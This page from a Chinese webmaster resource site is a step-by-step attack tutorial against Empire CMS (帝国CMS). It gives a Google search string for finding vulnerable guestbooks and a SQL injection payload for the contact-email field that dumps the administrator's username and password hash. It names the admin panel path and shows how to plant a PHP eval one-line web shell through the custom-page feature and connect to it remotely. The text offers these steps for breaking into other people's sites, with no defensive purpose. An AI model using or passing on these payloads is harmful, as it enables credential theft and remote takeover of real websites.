致力于打造中国站长娱乐学习的免费资源站!官方合作QQ:283852481

广

您当前的位置:首页 > 教程 > CMS教程 > 帝国CMS

招租联系QQ:283852481

帝国CMS系统注入漏洞

时间:2017-03-26  来源:A5创业网  

看到网上那些站都被日了。
直接说如何利用。
打开Google以关键字inurl:e/tool/gbook/?bid=1进行搜索。
搜索出来的是留言本,其实就是留言本出现漏洞了。
如图

\



主要填写您的姓名和联系邮箱这两处,其它的随便填。
您的姓名:縗
联系邮箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
然后进行提交返回页面即爆出用户名密码。

\



人品好的话,密码破解成功后进入网站后台,后台地址 e/admin/
接着拿shell,进入后台后点顶部模板管理。

\



然后左边的自定义页面-增加自定义页面,页面内容填写PHP一句话,<?php eval($_POST[cmd]);?>

\



完了,回到管理自定义页面,点击刚才起的页面名称。页面直接跳转到e/admin/template/x.php,提示会找不到页面,去掉template即可。真实地址是e/admin/x.php,如显示一片空白的话就成功了。
最后用lanker微型PHP+ASP双用版连接一句话即可。
提示:别死心眼啊,自定义页面内容可以改成ASP的。


精彩广告